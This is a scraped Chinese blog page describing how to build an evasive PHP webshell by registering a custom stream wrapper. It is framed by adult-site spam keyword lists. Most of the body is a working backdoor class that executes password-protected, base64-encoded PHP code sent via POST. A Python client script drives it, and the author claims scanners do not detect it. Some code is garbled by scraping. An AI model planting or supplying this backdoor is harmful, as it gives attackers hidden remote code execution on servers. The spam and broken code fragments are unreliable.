婷婷综合国产,91蜜桃婷婷狠狠久久综合9色 ,九九九九九精品,国产综合av

主頁 > 知識庫 > PHP使用流包裝器實現WebShell的方法

PHP使用流包裝器實現WebShell的方法
熱門標簽:電信外呼系統多少錢一個月 桂陽公司如何做地圖標注 合肥企業外呼系統線路 代理打電話機器人 太原400電話申請流程 萍鄉商鋪地圖標注 企業400電話辦理多少費用 神龍斗士電話機器人 宿州正規外呼系統軟件

0×00 前言

在Web安全領域WebShell的構造與查殺是永不停息的話題,這幾天發現了一種新型方式生成WebShell,隱蔽度高,目前安全查殺軟件沒法檢測到相關的后門漏洞,不同于 eval 或則 asset 等方式運行后門,對于這兩個函數禁用的情況下一樣適用,目前除了禁用相關函數還暫時沒有相關方式來避免漏洞。

0×01 后門原理

在PHP開發中,我們使用最為頻繁的指令大概就是 include 指令, include 指令中一些比較普通的文件包含漏洞我們就忽略了,先來看看一串代碼:

include 'http://www.test.com/code.php'

我們通過這一串代碼可以很容易的引用外部的PHP程序,但是前提是配置文件允許該行為被執行,先看看我的配置項

;;;;;;;;;;;;;;;;;;
; Fopen wrappers ;
;;;;;;;;;;;;;;;;;;
; Whether to allow the treatment of URLs (like http:// or ftp://) as files.
; http://php.net/allow-url-fopen
allow_url_fopen =Off
; Whether to allow include/require to open URLs (like http:// or ftp://) as files.
; http://php.net/allow-url-include
allow_url_include = Off

從配置文件可以看到,allow_url_include 被我關閉了,也就是包含遠程代碼是不可能執行的,但是我們這里利用了一個東西。http:// 流,我們知道,在PHP中很多東西都是可以通過流包裝器來使用的,比如常見的 php:// 流,我們可以通過 php://input 來獲取輸入流來讀取請求體的內容,那么根據這個思路,我們能不能通過流包裝器來實現代碼執行?答案是可行的 通過PHP函數 stream_wrapper_register 注冊包裝器,檢測特定的URL包裝功能,監控 include 流,在 include 流中動態生成PHP代碼,我將通過如下代碼執行一個 hello world 程序來證明這個過程

include 'hello://dxkite';

Hello Stream Wrapper 的實現

code = "position = 0;
  return true;
 }
 public function stream_read($count)
 {
  $ret = substr($this->code, $this->position, $count);
  $this->position += strlen($ret);
  return $ret;
 }
 public function stream_tell()
 {
  return $this->position;
 }
 public function stream_eof()
 {
  return $this->position >= strlen($this->code);
 }
 public function stream_seek($offset, $whence)
 {
  switch ($whence) {
   case SEEK_SET:
    if ($offset  strlen($this->code)  $offset >= 0) {
     $this->position = $offset;
     return true;
    } else {
     return false;
    }
    break;
   case SEEK_CUR:
    if ($offset >= 0) {
     $this->position += $offset;
     return true;
    } else {
     return false;
    }
    break;
   case SEEK_END:
    if (strlen($this->code) + $offset >= 0) {
     $this->position = strlen($this->code) + $offset;
     return true;
    } else {
     return false;
    }
    break;
   default:
    return false;
  }
 }
 public function stream_stat()
 {
  return stat(FILE);
 }
}
stream_wrapper_register('hello', HelloStream::class);
include 'hello://dxkite';

通過如上的代碼,經過執行后,可以輸出一個 hello worldHelloWorld

 

0×02 后門示例

通過上述程序,我們實現了通過 include 指令直接執行 php ,并插入我們想要的效果,我們現在根據這個原理寫一個Shell:

后門程序

@link //dxkite.cn
 */
class ShellStream
{
 protected $position;
 protected $code;
 public function stream_open($path, $mode, $options, $opened_path)
 {
  $url = parse_url($path);
  $name = $url["host"];
  $this->code = base64_decode($name);
  $this->position = 0;
  return true;
 }
 public function stream_read($count)
 {
  $ret = substr($this->code, $this->position, $count);
  $this->position += strlen($ret);
  return $ret;
 }
 public function stream_tell()
 {
  return $this->position;
 }
 public function stream_eof()
 {
  return $this->position >= strlen($this->code);
 }
 public function stream_seek($offset, $whence)
 {
  switch ($whence) {
   case SEEK_SET:
    if ($offset  strlen($this->code)  $offset >= 0) {
     $this->position = $offset;
     return true;
    } else {
     return false;
    }
    break;
   case SEEK_CUR:
    if ($offset >= 0) {
     $this->position += $offset;
     return true;
    } else {
     return false;
    }
    break;
   case SEEK_END:
    if (strlen($this->code) + $offset >= 0) {
     $this->position = strlen($this->code) + $offset;
     return true;
    } else {
     return false;
    }
    break;
   default:
    return false;
  }
 }
 // include
 public function stream_stat()
 {
  return stat(FILE);
 }
 // file exists
 public function url_stat(string $path,int $stat)
 {
  return stat(FILE);
 }
 public static function shell(){
  stream_wrapper_register('shell', ShellStream::class);
  if (isset($_POST['password'])  $_POST['code']) {
   if ($_POST['password']=='dxkite') {
    $code = $_POST['code'];
    include 'shell://'.$code;
   } else {
    include 'shell://PD9waHAgZWNobyAiaGVsbG8gaGFjayI7';
   }
  }
 }
}

ShellStream::shell();

 

上述我實現了一個使用 $_POST 作為輸入,接收密碼和php代碼的base64并執行代碼的后門利用程序

import requests 
import base64
import sys
def send_raw(url,password,cmd):
 res=requests.post(url,{
  'password':password,
  'code': base64.b64encode(cmd.encode('utf-8')) 
 })
 return res.text
def send_php_shell(url,password,cmd):
 return send_raw(url,password,'')
  if cmd == 'exit':
   break
  elif cmd.startswith('run'):
   cmd,path = cmd.split(' ',1)
   code = ''
   with open(path) as f:
    for line in f:
     code = code + line + "\r\n" 
   response = send_raw(url,password,code);
   print(response)
  else:
   response = send_php_shell(url,password,cmd);
   print(response)

我們把我們的 shell.php 部署到服務器上,執行測試 shell.py :

php-shell.png

其中,test.php 的內容為:

?php
 include 'PD9waHAgZWNobyAiaGVsbG8gc2hlbGxcclxuIjs';
 echo 'hello, shell world';

0×03 后門查殺

百度在線掃描

 

安全狗本地掃描

 

總結

以上所述是小編給大家介紹的PHP使用流包裝器實現WebShell的方法,希望對大家有所幫助,如果大家有任何疑問歡迎給我留言,小編會及時回復大家的!

您可能感興趣的文章:
  • php木馬webshell掃描器代碼
  • 精確查找PHP WEBSHELL木馬 修正版
  • 精確查找PHP WEBSHELL木馬的方法(1)
  • PHP webshell檢查工具 python實現代碼
  • phpMyAdmin 后臺拿webshell

標簽:崇左 白銀 太原 廊坊 辛集 綏化 衡陽 鄂州

巨人網絡通訊聲明:本文標題《PHP使用流包裝器實現WebShell的方法》,本文關鍵詞  PHP,使用,流,包裝,器,實現,;如發現本文內容存在版權問題,煩請提供相關信息告之我們,我們將及時溝通與處理。本站內容系統采集于網絡,涉及言論、版權與本站無關。
  • 相關文章
  • 下面列出與本文章《PHP使用流包裝器實現WebShell的方法》相關的同類信息!
  • 本頁收集關于PHP使用流包裝器實現WebShell的方法的相關信息資訊供網民參考!
    • 推薦文章
    婷婷综合国产,91蜜桃婷婷狠狠久久综合9色 ,九九九九九精品,国产综合av
    看片的网站亚洲| 国产黄色精品视频| 蜜臀a∨国产成人精品| 日韩在线卡一卡二| 精品一区二区成人精品| 久久人人爽爽爽人久久久| 久久网站最新地址| 日韩伦理av电影| 亚洲成a人v欧美综合天堂下载| 蜜臀av一区二区| 99免费精品在线| 日韩欧美资源站| 中文字幕一区二区三区精华液| 亚洲mv在线观看| 国产在线视视频有精品| 在线国产电影不卡| 久久久精品日韩欧美| 午夜激情一区二区| 不卡视频在线观看| 欧美成人精精品一区二区频| 亚洲精品你懂的| 成人亚洲一区二区一| 在线电影院国产精品| 1000部国产精品成人观看| 国产精品一色哟哟哟| 一区二区三区日本| 欧美va亚洲va国产综合| 成人国产精品免费网站| 午夜欧美2019年伦理| 久久精品一区二区三区av| 91精品办公室少妇高潮对白| 国产一区二区在线影院| 亚洲第一主播视频| 久久久不卡网国产精品二区| 在线影院国内精品| 黄一区二区三区| 亚洲一区免费视频| 欧美国产欧美综合| 欧美一级电影网站| 欧美中文字幕一区二区三区亚洲 | 99视频精品全部免费在线| 精品一区二区日韩| 欧美日韩一区视频| 亚洲免费高清视频在线| 成人黄色免费短视频| 久久免费精品国产久精品久久久久| 香蕉久久一区二区不卡无毒影院| 97久久超碰精品国产| 久久久www成人免费无遮挡大片 | 亚洲va在线va天堂| 99免费精品视频| 国产精品理论在线观看| 国产福利一区二区| 久久免费电影网| 国产一区二区三区不卡在线观看| 精品国产乱子伦一区| 老司机免费视频一区二区| 91精品国产91久久久久久最新毛片 | 美女被吸乳得到大胸91| 在线视频国内一区二区| 亚洲精品videosex极品| 日本道色综合久久| 一区二区三区在线免费| 欧美亚洲国产怡红院影院| 国产欧美精品日韩区二区麻豆天美| 欧美日韩亚洲综合| 欧美日韩在线播放| 51精品久久久久久久蜜臀| 欧美三级午夜理伦三级中视频| 欧美影院午夜播放| 欧美日韩精品欧美日韩精品一综合| 欧美亚洲禁片免费| 在线播放中文一区| 精品毛片乱码1区2区3区| 精品免费99久久| 国产亚洲一区二区在线观看| 日本一区二区三区国色天香 | 欧美亚洲愉拍一区二区| 欧洲av在线精品| 欧美精选一区二区| 91精品国产色综合久久| 亚洲精品一区二区三区蜜桃下载 | 成人免费视频播放| heyzo一本久久综合| 91久久精品一区二区三| 欧美精品tushy高清| 久久综合色鬼综合色| 国产日韩欧美高清在线| 亚洲图片你懂的| 亚洲高清中文字幕| 国产一区二区在线电影| 91视频一区二区三区| 日韩美女在线视频| 99久久精品国产精品久久| 国产人成一区二区三区影院| 蜜桃视频在线一区| 欧美一区二区视频网站| 三级影片在线观看欧美日韩一区二区 | 亚洲国产精品久久人人爱蜜臀| 国产一区二区免费视频| 精品免费国产二区三区| 韩国理伦片一区二区三区在线播放| 欧美理论片在线| 狠狠色狠狠色综合日日91app| 久久免费的精品国产v∧| 91在线一区二区三区| 亚洲精品国久久99热| 日韩一区二区在线看| 久久99精品国产| 中文字幕亚洲欧美在线不卡| 欧美日韩国产综合一区二区三区| 精品中文字幕一区二区| 亚洲人123区| 欧美mv和日韩mv的网站| 色综合久久99| 免费一区二区视频| 国产精品成人网| 精品久久久久久久久久久院品网| 91在线一区二区| 色综合一区二区| 99精品欧美一区二区蜜桃免费| 久久99精品国产.久久久久 | 一本久道久久综合中文字幕| 亚洲大片一区二区三区| 中文字幕中文字幕一区| 久久久99精品免费观看| 欧美一区在线视频| 99久久精品国产麻豆演员表| 国产成人免费视频网站| 韩日av一区二区| 美女看a上一区| 丁香网亚洲国际| 成人黄色综合网站| 丁香婷婷综合色啪| 99视频国产精品| 精品国产sm最大网站免费看| 国产在线视频精品一区| 丰满亚洲少妇av| 欧美日韩高清一区二区三区| 国产婷婷色一区二区三区四区| 亚洲男人天堂一区| 亚洲国产wwwccc36天堂| 99麻豆久久久国产精品免费| gogogo免费视频观看亚洲一| 欧美写真视频网站| 国产视频亚洲色图| 日韩av电影一区| 色综合天天在线| 亚洲日本丝袜连裤袜办公室| 精品一区免费av| 欧美男生操女生| 亚洲影视在线观看| 成人av电影在线| 久久精品欧美日韩| 久草这里只有精品视频| 制服丝袜成人动漫| 五月婷婷综合激情| 欧美午夜宅男影院| 亚洲嫩草精品久久| 91国偷自产一区二区三区成为亚洲经典 | 91蜜桃婷婷狠狠久久综合9色| 久久女同精品一区二区| 日韩av电影免费观看高清完整版| 91女厕偷拍女厕偷拍高清| 91社区在线播放| 亚洲妇熟xx妇色黄| 欧美激情综合网| 9久草视频在线视频精品| 亚洲激情在线播放| 欧美区在线观看| 国产毛片精品视频| 亚洲欧美日韩国产中文在线| 欧美色成人综合| 国产一级精品在线| 亚洲主播在线播放| 精品国产91亚洲一区二区三区婷婷| 国产一区二区在线观看视频| 亚洲欧美综合在线精品| 欧美精品高清视频| 99国内精品久久| 久久99精品国产麻豆婷婷| 成人欧美一区二区三区小说| 欧美精品第一页| 一本到三区不卡视频| 久久99国产精品免费| 亚洲美女屁股眼交3| 精品国产sm最大网站| 欧美日产在线观看| 不卡的av电影在线观看| 免费三级欧美电影| 亚洲国产毛片aaaaa无费看| 久久精品一级爱片| 欧美一级一区二区| 91免费在线看| 国产69精品久久99不卡| 亚洲成人自拍一区| 有坂深雪av一区二区精品| 欧美国产日本韩| 精品国产自在久精品国产| 制服丝袜日韩国产|